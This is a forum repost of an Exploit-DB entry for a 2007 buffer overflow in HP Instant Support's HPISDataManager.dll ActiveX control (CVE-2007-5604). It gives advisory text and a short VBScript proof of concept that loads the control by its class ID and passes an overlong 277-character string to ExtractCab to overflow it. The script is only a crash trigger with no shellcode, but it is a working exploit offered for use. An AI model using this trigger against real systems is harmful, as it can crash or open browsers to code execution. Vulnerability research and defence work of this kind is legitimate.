Exploit HP Instant Support 1.0.22 - 'HPISDataManager.dll ExtractCab' ActiveX Control Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31873
Проверка EDB
  1. Пройдено
Автор
DENNIS RAND
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2007-5604
Дата публикации
2008-06-03
XML:
source: https://www.securityfocus.com/bid/29529/info

HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

An attacker can exploit this issue to execute arbitrary code in the context of an application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.

HP Instant Support 1.0.0.22 and earlier versions are affected.

NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. 

<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Function ExtractCab ( ByVal filepath As String , ByVal destpath As String ) As String" memberName = "ExtractCab" progid = "HPISDataManagerLib.Datamgr" argCount = 2 arg1=String(277, "B") arg2="defaultV" target.ExtractCab arg1 ,arg2 </script></job></package>
 
Источник
www.exploit-db.com

Похожие темы